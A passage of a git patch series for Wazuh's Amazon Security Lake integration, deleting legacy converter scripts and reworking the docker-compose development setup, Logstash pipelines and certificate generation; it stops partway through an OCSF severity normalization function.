.../transform/legacy/legacy_test.py | 15 --- integrations/docker/docker-compose.yml | 117 ------------------ 4 files changed, 310 deletions(-) delete mode 100755 integrations/amazon-security-lake/stdin_to_securitylake.py delete mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_converter.py delete mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_test.py delete mode 100644 integrations/docker/docker-compose.yml diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py deleted file mode 100755 index 4aa650b158c54..0000000000000 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ /dev/null @@ -1,91 +0,0 @@ -#!/env/bin/python3.9 - -import os -import sys -import argparse -import logging -import time -import json -import datetime -from pyarrow import parquet, Table, fs - -from transform import converter - -block_ending = { "block_ending": True } - -def encode_parquet(list,foldername,filename): - try: - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) - except Exception as e: - logging.error(e) - raise - -def map_block(fileobject, length): - output=[] - ocsf_mapped_alert = {} - for line in range(0, length): - line = fileobject.readline() - if line == '': - output.append(block_ending) - break - alert = json.loads(line) - ocsf_mapped_alert = converter.convert(alert) - output.append(ocsf_mapped_alert) - return output - -def get_elapsedseconds(reference_timestamp): - current_time = datetime.datetime.now(datetime.timezone.utc) - return (current_time - 
reference_timestamp).total_seconds() - -if __name__ == "__main__": - date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') - parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') - parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') - parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') - parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') - args = parser.parse_args() - #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) - logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) - logging.info('BUFFERING STDIN') - - try: - - with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: - output_buffer = [] - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - - try: - while True: - - current_block = map_block( stdin, args.linebuffer ) - - if current_block[-1] == block_ending: - output_buffer += current_block[0:-1] - time.sleep(args.sleeptime) - else: - output_buffer += current_block - - if len(output_buffer) == 0: - continue - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - logging.info('Writing data to parquet file') - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] - - except KeyboardInterrupt: - logging.info("Keyboard Interrupt issued") - exit(0) - - logging.info('FINISHED RETRIEVING STDIN') - - except Exception as e: - logging.error("Error running script") - logging.error(e) - raise diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py deleted file mode 100644 index 2a14b75957c97..0000000000000 --- a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py +++ /dev/null @@ -1,87 +0,0 @@ -#!/usr/bin/python - -# event comes from Filebeat -event = {} - - -def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level - - -def join(iterable, separator=","): - return (separator.join(iterable)) - - -def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. 
- """ - ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["rule"]["firedtimes"], - "message": event["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["rule"]["groups"]), - "name": event["decoder"]["name"], - "type_id": 1, - "uid": event["rule"]["id"], - }, - "attacks": { - "tactic": { - "name": join(event["rule"]["mitre"]["tactic"]), - }, - "technique": { - "name": join(event["rule"]["mitre"]["technique"]), - "uid": join(event["rule"]["mitre"]["id"]), - }, - "version": "v13.1" - }, - "title": event["rule"]["description"], - "types": [ - event["input"]["type"] - ], - "uid": event['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - "raw_data": event["full_log"], - "resources": [ - { - "name": event["agent"]["name"], - "uid": event["agent"]["id"] - }, - ], - "risk_score": event["rule"]["level"], - "severity_id": normalize(event["rule"]["level"]), - "status_id": 99, - "time": event["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["location"], - event["manager"]["name"] - ], - "nist": event["rule"]["nist_800_53"], # Array - } - } - - return ocsf_class_template diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_test.py b/integrations/amazon-security-lake/transform/legacy/legacy_test.py deleted file mode 100644 index ebcb8fa4b2e90..0000000000000 --- a/integrations/amazon-security-lake/transform/legacy/legacy_test.py +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/python - -from transform.legacy.converter import convert -import json - -converted_event = {} -with open("../wazuh-event.sample.json", "r") as fd: - sample_event = json.load(fd) - # print(json.dumps(sample_event, indent=4)) - converted_event = convert(sample_event) - -if converted_event: - with open("../wazuh-event.ocsf.json", "w") as fd: - json.dump(converted_event, fd) - print("Done") diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml deleted file mode 100644 index dd7f12f119e05..0000000000000 --- a/integrations/docker/docker-compose.yml +++ /dev/null @@ -1,117 +0,0 @@ -version: "3.8" - -services: - - events-generator: - image: events-generator - build: - dockerfile_inline: | - FROM ubuntu:20.04 - RUN apt update && apt install -y python3-requests - container_name: events-generator - volumes: - - ../tools/events-generator:/home/events-generator - hostname: events-generator - working_dir: "/home/events-generator" - entrypoint: sh -c "python3 run.py" - networks: - wazuh-indexer-dev: - aliases: - - events-generator - ipv4_address: 172.18.0.2 - depends_on: - - wazuh-indexer - - wazuh-indexer: - image: wazuh/wazuh-indexer:4.8.0-beta1 - container_name: wazuh-indexer - hostname: wazuh-indexer - restart: always - networks: - wazuh-indexer-dev: - aliases: - - wazuh-indexer - ipv4_address: 172.18.0.3 - ports: - - "9222:9200" - depends_on: - - generator - environment: - - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g" - - "bootstrap.memory_lock=true" - - 'INDEXER_PASSWORD=SecretPassword' - ulimits: - memlock: - soft: -1 - hard: -1 - nofile: - soft: 65536 - hard: 65536 - volumes: - - ./wazuh-indexer-data:/var/lib/wazuh-indexer - - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem - - 
./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key - - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem - - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem - - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem - - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml - - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml - - generator: - image: wazuh/wazuh-certs-generator:0.0.1 - hostname: wazuh-certs-generator - volumes: - - ./config/wazuh_indexer_ssl_certs/:/certificates/ - - ./config/certs.yml:/config/certs.yml - environment: - - HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS - - logstash: - image: logstash - build: - dockerfile_inline: | - FROM ubuntu:20.04 - RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https - WORKDIR /home/logstash - RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ - echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ - apt update && \ - apt install -y logstash && \ - chown -R logstash:logstash /etc/logstash && \ - chown logstash:logstash /home/logstash - entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic - container_name: logstash - hostname: logstash - user: logstash - volumes: - - ../amazon-security-lake:/home/logstash - - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf - - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml - networks: - wazuh-indexer-dev: - aliases: - - logstash - ipv4_address: 172.18.0.4 - depends_on: - - wazuh-indexer - - s3-ninja - - s3-ninja: - image: scireum/s3-ninja - container_name: s3-ninja - hostname: s3-ninja - volumes: - - ./s3-ninja_data:/home/sirius/data - networks: - wazuh-indexer-dev: - aliases: - - s3-ninja - ipv4_address: 172.18.0.5 - ports: - - "9444:9000" - -networks: - wazuh-indexer-dev: - ipam: - config: - - subnet: "172.18.0.0/16" From 5fcc9a394a339f373a5a7a557bc302b7efcfc42e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 16:19:33 +0100 Subject: [PATCH 28/34] Cleanup --- integrations/amazon-security-lake/run.py | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py index 515d1d97610f9..c26adffa2ea0f 100644 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py @@ -17,19 +17,9 @@ def _test(): print("--") print("") print(ocsf_event) - # event = Event.model_validate_json(json.dumps(event)) - # print(event) - # ocsf_event = to_detection_finding(event) except KeyError as e: raise (e) - # except ValidationError as e: - # print(e) - - # if ocsf_event: - # with open("wazuh-event.ocsf.json", "w") as fd: - # json.dump(ocsf_event.model_dump(), fd) - # print(ocsf_event.model_dump()) if __name__ == '__main__': From a2464104dfcddfb28f4376d12a38bd1cc07ac3e1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 18:06:09 +0100 Subject: [PATCH 29/34] Add FQDN hostnames to services for certificates creation --- integrations/docker/amazon-security-lake.yml | 49 
+++++++++++--------- 1 file changed, 26 insertions(+), 23 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 67effe4deed55..5c2b09d133089 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -7,20 +7,21 @@ services: context: ../tools/events-generator container_name: events-generator depends_on: - - opensearch-node + - wazuh.indexer networks: - - opensearch-net + - net # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. - command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a opensearch-node" + command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer" - opensearch-node: - image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues - container_name: opensearch-node + wazuh.indexer: + image: opensearchproject/opensearch:latest + container_name: wazuh.indexer + hostname: wazuh.indexer environment: - - cluster.name=opensearch-cluster - - node.name=opensearch-node - - discovery.seed_hosts=opensearch-node - - cluster.initial_cluster_manager_nodes=opensearch-node + # - cluster.name=opensearch-cluster + - node.name=wazuh.indexer + - discovery.type=single-node + # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: @@ -31,26 +32,28 @@ services: soft: 65536 hard: 65536 volumes: - - opensearch-data:/usr/share/opensearch/data + - data:/usr/share/opensearch/data networks: - - opensearch-net + - net - opensearch-dashboards: + wazuh.dashboard: image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes - container_name: opensearch-dashboards + container_name: wazuh.dashboard + hostname: wazuh.dashboard ports: - 5601:5601 # Map host port 5601 to container port 5601 expose: - "5601" # Expose port 5601 for web access to OpenSearch Dashboards environment: - OPENSEARCH_HOSTS: '["https://opensearch-node:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query + OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query networks: - - opensearch-net - logstash: + - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: context: ../amazon-security-lake - container_name: logstash + container_name: wazuh.integration.security.lake + hostname: wazuh.integration.security.lake environment: LOG_LEVEL: trace LOGSTASH_KEYSTORE_PASS: "SecretPassword" @@ -63,14 +66,14 @@ services: volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline depends_on: - - opensearch-node + - wazuh.indexer networks: - - opensearch-net + - net command: tail -f /dev/null - # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.config --path.settings /etc/logstash + # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash volumes: - opensearch-data: + data: networks: - opensearch-net: \ No newline at end of file + net: \ No newline at end of file From b72d2b5eaf38c7753ebe5f4e96e16620aac9d5fe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 29 Feb 2024 16:29:43 +0100 Subject: [PATCH 30/34] Add S3 Ninja (Mock) (#165) --- 
integrations/docker/amazon-security-lake.yml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 5c2b09d133089..d44598029eb0f 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -48,6 +48,7 @@ services: OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query networks: - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: @@ -58,6 +59,8 @@ services: LOG_LEVEL: trace LOGSTASH_KEYSTORE_PASS: "SecretPassword" MONITORING_ENABLED: false + AWS_KEY: "AKIAIOSFODNN7EXAMPLE" + AWS_SECRET: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" ports: - "5000:5000/tcp" - "5000:5000/udp" @@ -72,8 +75,20 @@ services: command: tail -f /dev/null # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash + s3.ninja: + image: scireum/s3-ninja:latest + container_name: s3.ninja + hostname: s3.ninja + ports: + - "9444:9000" + volumes: + - s3-data:/home/sirius/data + networks: + - net + volumes: data: + s3-data: networks: net: \ No newline at end of file From 90cb9abe7525a3ac51217745c83b94236294c0f4 Mon Sep 17 00:00:00 2001 From: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> Date: Thu, 29 Feb 2024 13:10:58 -0300 Subject: [PATCH 31/34] Setup certificates in Wazuh Indexer and Logstash containers (#166) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Add certificate generator service * Add certificate config to docker compose file * Use secrets for certificates * Disable permission handling inside cert's generator entrypoint.sh * Back to using a bind mount for certs * Have entrypoint.sh generate certs with 1000:1000 ownership * Correct certificate permissions and bind mounting * Add security initialization variable to compose file * Fix permissions on certs generator entrypoint * Add cert generator config file * Remove old cert generator dir * Set indexer hostname right in pipeline file * Roll back commented code --------- Signed-off-by: Álex Ruiz Co-authored-by: Álex Ruiz --- integrations/.gitignore | 3 +- .../pipeline/indexer-to-integrator.conf | 22 +++--- integrations/docker/amazon-security-lake.yml | 69 ++++++++++++------- integrations/docker/config/certs.yml | 16 +++++ 4 files changed, 72 insertions(+), 38 deletions(-) create mode 100644 integrations/docker/config/certs.yml diff --git a/integrations/.gitignore b/integrations/.gitignore index 8f10b6459740c..ee1a01f52633d 100644 --- a/integrations/.gitignore +++ b/integrations/.gitignore @@ -2,4 +2,5 @@ elastic opensearch splunk common -config \ No newline at end of file +config +docker/certs \ No newline at end of file diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 0cc7a7d089ec3..2f70beebbfaaa 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -1,9 +1,10 @@ input { opensearch { - hosts => ["opensearch-node:9200"] + hosts => ["wazuh.indexer:9200"] user => "${INDEXER_USERNAME}" password => "${INDEXER_PASSWORD}" - ssl => false + ssl => true + ca_file => "/usr/share/logstash/root-ca.pem" index => 
"wazuh-alerts-4.x-*" query => '{ "query": { @@ -20,15 +21,10 @@ input { } output { - - stdout { codec => rubydebug } - - pipe - { - id => "securityLake" - message_format => "%{_source}" - ttl => "10" - command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" - } - + pipe { + id => "securityLake" + message_format => "%{_source}" + ttl => "10" + command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + } } diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index d44598029eb0f..65a8905bcd987 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -1,4 +1,4 @@ -version: '3' +version: "3.8" name: "amazon-security-lake" services: events-generator: @@ -7,22 +7,35 @@ services: context: ../tools/events-generator container_name: events-generator depends_on: - - wazuh.indexer - networks: - - net - # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. - command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer" + wazuh.indexer: + condition: service_healthy + command: bash -c "python run.py -a wazuh.indexer" wazuh.indexer: - image: opensearchproject/opensearch:latest + image: opensearchproject/opensearch:2.11.1 container_name: wazuh.indexer + depends_on: + wazuh-certs-generator: + condition: service_completed_successfully hostname: wazuh.indexer + ports: + - 9200:9200 environment: # - cluster.name=opensearch-cluster - node.name=wazuh.indexer - discovery.type=single-node # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true + - "DISABLE_INSTALL_DEMO_CONFIG=true" + - plugins.security.ssl.http.enabled=true + - plugins.security.allow_default_init_securityindex=true + - plugins.security.ssl.http.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem + - plugins.security.ssl.transport.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem + - plugins.security.ssl.http.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem + - plugins.security.ssl.transport.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem + - plugins.security.ssl.http.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem + - plugins.security.ssl.transport.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem + - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US" - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: memlock: @@ -31,14 +44,21 @@ services: nofile: soft: 65536 hard: 65536 + healthcheck: + test: curl -sku admin:admin https://localhost:9200/_cat/health | grep -q docker-cluster + start_period: 10s + start_interval: 3s volumes: - data:/usr/share/opensearch/data - networks: - - net + - ./certs/wazuh.indexer.pem:/usr/share/opensearch/config/wazuh.indexer.pem + - ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem + - ./certs/root-ca.pem:/usr/share/opensearch/config/root-ca.pem wazuh.dashboard: - image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes + image: opensearchproject/opensearch-dashboards:2.11.1 container_name: wazuh.dashboard + depends_on: + - wazuh.indexer hostname: wazuh.dashboard ports: - 5601:5601 # Map host port 5601 to container port 5601 @@ -46,14 +66,14 @@ services: - "5601" # Expose port 5601 for web access to OpenSearch Dashboards 
environment: OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query - networks: - - net - + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: context: ../amazon-security-lake container_name: wazuh.integration.security.lake + depends_on: + - wazuh.indexer hostname: wazuh.integration.security.lake environment: LOG_LEVEL: trace @@ -68,12 +88,9 @@ services: - "9600:9600" volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline - depends_on: - - wazuh.indexer - networks: - - net - command: tail -f /dev/null - # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash + - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem + # command: tail -f /dev/null + command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic s3.ninja: image: scireum/s3-ninja:latest @@ -83,12 +100,16 @@ services: - "9444:9000" volumes: - s3-data:/home/sirius/data - networks: - - net + + wazuh-certs-generator: + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + container_name: wazuh-certs-generator + entrypoint: sh -c "/entrypoint.sh; chown -R 1000:999 /certificates; chmod 740 /certificates; chmod 440 /certificates/*" + volumes: + - ./certs/:/certificates/ + - ./config/certs.yml:/config/certs.yml volumes: data: s3-data: - -networks: - net: \ No newline at end of file diff --git a/integrations/docker/config/certs.yml b/integrations/docker/config/certs.yml new file mode 100644 index 0000000000000..c3e017be10eea --- /dev/null +++ b/integrations/docker/config/certs.yml @@ -0,0 +1,16 @@ +nodes: + # Wazuh indexer server nodes + indexer: + - name: wazuh.indexer + ip: wazuh.indexer + + # Wazuh server nodes + # Use node_type only with more than one Wazuh manager + server: + - name: wazuh.manager + ip: wazuh.manager + + # Wazuh dashboard node + dashboard: + - name: wazuh.dashboard + ip: wazuh.dashboard From c111dee7affbc6f7092d075b71a7c38560e43a38 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 29 Feb 2024 17:17:45 +0100 Subject: [PATCH 32/34] Fix Logstash pipelines --- .../logstash/pipeline/indexer-to-file.conf | 6 ++++-- .../logstash/pipeline/indexer-to-integrator.conf | 2 +- .../logstash/pipeline/indexer-to-s3.conf | 10 +++++----- 3 files changed, 10 insertions(+), 8 deletions(-) diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf index e3fa60a785372..4d5a47169e197 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf @@ -1,9 +1,10 @@ input { opensearch { - hosts => ["opensearch-node:9200"] + hosts => ["wazuh.indexer:9200"] user => "${INDEXER_USERNAME}" password => "${INDEXER_PASSWORD}" - ssl => false + ssl => true + ca_file => "/usr/share/logstash/root-ca.pem" index => "wazuh-alerts-4.x-*" query => '{ "query": { @@ -19,6 +20,7 @@ input { } } + output { file { path => "/usr/share/logstash/pipeline/indexer-to-file.json" diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 2f70beebbfaaa..81a4bdad5883a 100644 --- 
a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -25,6 +25,6 @@ output { id => "securityLake" message_format => "%{_source}" ttl => "10" - command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + command => "/usr/bin/env python3 /usr/local/bin/run.py -d" } } diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf index 6ca2ca0d5a08f..22d44b9d0d3f5 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf @@ -1,11 +1,11 @@ input { opensearch { - hosts => ["localhost:9200"] - user => "${WAZUH_INDEXER_USERNAME}" - password => "${WAZUH_INDEXER_PASSWORD}" - index => "wazuh-alerts-4.x-*" + hosts => ["wazuh.indexer:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" ssl => true - ca_file => "/etc/logstash/wi-certs/root-ca.pem" + ca_file => "/usr/share/logstash/root-ca.pem" + index => "wazuh-alerts-4.x-*" query => '{ "query": { "range": { From b84ff0bfcf627f6885c5d425a67780f2e167c0e0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 29 Feb 2024 18:17:57 +0100 Subject: [PATCH 33/34] Remove unused file --- integrations/ocsf-mapping.json | 86 ---------------------------------- 1 file changed, 86 deletions(-) delete mode 100644 integrations/ocsf-mapping.json diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json deleted file mode 100644 index c1238dac285df..0000000000000 --- a/integrations/ocsf-mapping.json +++ /dev/null @@ -1,86 +0,0 @@ -{ - "1.0.0": - { - "constants": - { - "activity_id" : 1, - "analytic.type" : "Rule", - "analytic.type_id" : 1, - "attacks.version" : "v13.1", - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "status_id" : 99, - "type_uid" : 200101 - }, - "mappings": - { - "analytic.category" : "rule.groups", - "analytic.name" : "decoder.name", - "analytic.uid" : "rule.id", - "attacks.tactics" : "rule.mitre.tactic", - "attacks.technique" : "rule.mitre.technique", - "count" : "rule.firedtimes", - "data_sources" : ["_index", "location", "manager.name"], - "finding.title" : "rule.description", - "finding.types" : "input.type", - "finding.uid" : "id", - "message" : "rule.description", - "nist" : "rule.nist_800_53", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" - } - }, - "1.1.0": - { - "constants": - { - "activity_id" : 1, - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "finding_info.analytic.type" : "Rule", - "finding_info.analytic.type_id" : 1, - "finding_info.attacks.version" : "v13.1", - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "status_id" : 99, - "type_uid" : 200101 - }, - "mappings": 
- { - "count" : "rule.firedtimes", - "finding_info.analytic.category" : "rule.groups", - "finding_info.analytic.name" : "decoder.name", - "finding_info.analytic.uid" : "rule.id", - "finding_info.attacks.tactic" : "rule.mitre.tactic", - "finding_info.attacks.technique" : "rule.mitre.technique", - "finding_info.title" : "rule.description", - "finding_info.types" : "input.type", - "finding_info.uid" : "id", - "message" : "rule.description", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" - } - } -} From 1210c077a2cb03985633d6bc8b698dc35cdcd958 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 1 Mar 2024 17:15:28 +0100 Subject: [PATCH 34/34] Implement OCSF severity normalize function --- integrations/README.md | 7 +++- .../amazon-security-lake/parquet/test.py | 1 - .../transform/converter.py | 42 +++++++------------ 3 files changed, 20 insertions(+), 30 deletions(-) diff --git a/integrations/README.md b/integrations/README.md index 5e69b4f673d6c..ae3253b8547b8 100644 --- a/integrations/README.md +++ b/integrations/README.md @@ -5,7 +5,12 @@ The goal is to transport Wazuh's analysis to the platform that suits your needs. ### Amazon Security Lake -TBD +Amazon Security Lake automatically centralizes security data from AWS environments, SaaS providers, +on premises, and cloud sources into a purpose-built data lake stored in your account. With Security Lake, +you can get a more complete understanding of your security data across your entire organization. You can +also improve the protection of your workloads, applications, and data. Security Lake has adopted the +Open Cybersecurity Schema Framework (OCSF), an open standard. With OCSF support, the service normalizes +and combines security data from AWS and a broad range of enterprise security data sources. ##### Usage diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py index 2022111b25e33..318da6ebe4740 100644 --- a/integrations/amazon-security-lake/parquet/test.py +++ b/integrations/amazon-security-lake/parquet/test.py @@ -4,7 +4,6 @@ from parquet import Parquet import json -# converted_event = {} with open("wazuh-event.ocsf.json", "r") as fd: events = [json.load(fd)] table = pa.Table.from_pylist(events) diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py index 983ba9572841f..90f8eeef27bac 100644 --- a/integrations/amazon-security-lake/transform/converter.py +++ b/integrations/amazon-security-lake/transform/converter.py @@ -8,8 +8,20 @@ def normalize(level: int) -> int: """ Normalizes rule level into the 0-6 range, required by OCSF. 
